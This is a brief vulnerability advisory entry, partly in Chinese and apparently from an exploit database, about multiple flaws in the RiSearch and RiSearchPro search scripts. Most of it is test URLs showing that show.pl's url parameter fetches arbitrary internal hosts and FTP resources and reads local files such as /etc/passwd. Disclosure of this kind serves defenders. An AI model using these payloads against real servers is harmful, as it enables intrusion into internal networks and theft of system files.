RiSearch和RiSearchPro多个安全漏洞 Exploit

🗓️ 08 Dec 2006 00:00:00Reported by RootType

RiSearch and RiSearchPro multiple security vulnerabilities exploi


                                                Phil Robinson、Gerald Gallagher和Kendric Tang提供了如下测试方法：

http://10.0.0.0/cgi-bin/search/show.pl?url=http://www.google.com
http://10.0.0.0/cgi-bin/search/show.pl?url=http://192.168.0.1
http://10.0.0.0/cgi-bin/search/show.pl?url=http://localhost:8080
http://10.0.0.0/cgi-bin/search/show.pl?url=ftp://192.168.0.1
http://10.0.0.0/cgi-bin/search/show.pl?url=ftp://username:[email protected]
http://10.0.0.0/cgi-bin/search/show.pl?url=file:/etc/passwd

08 Dec 2006 00:00Current

7.1High risk

Vulners AI Score7.1